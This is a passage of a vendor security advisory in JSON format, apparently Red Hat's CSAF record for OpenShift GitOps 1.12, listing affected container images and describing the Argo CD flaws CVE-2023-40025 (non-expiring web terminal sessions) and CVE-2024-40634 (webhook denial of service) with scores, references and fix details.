"name": "openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x"
},
"product_reference": "openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64"
},
"product_reference": "openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"relates_to_product_reference": "9Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64"
},
"product_reference": "openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64",
"relates_to_product_reference": "9Base-GitOps-1.12"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40025",
"cwe": {
"id": "CWE-613",
"name": "Insufficient Session Expiration"
},
"discovery_date": "2024-07-30T04:26:12+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2301445"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Argo CD. Affected versions of Argo CD have a bug where open web terminal sessions do not expire. This bug allows users to send WebSocket messages even if the token has expired. The most straightforward scenario occurs when a user opens the terminal view and leaves it open for an extended period. This flaw allows users to view sensitive information even after logging out.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argo-cd: Argo CD web terminal session doesn\u0027t expire",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40025"
},
{
"category": "external",
"summary": "RHBZ#2301445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301445"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40025"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr",
"url": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr"
}
],
"release_date": "2023-08-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-08-01T11:04:17+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4973"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "argo-cd: Argo CD web terminal session doesn\u0027t expire"
},
{
"cve": "CVE-2024-40634",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-23T14:26:36+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2299473"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD",
"title": "Vulnerability summary"
},
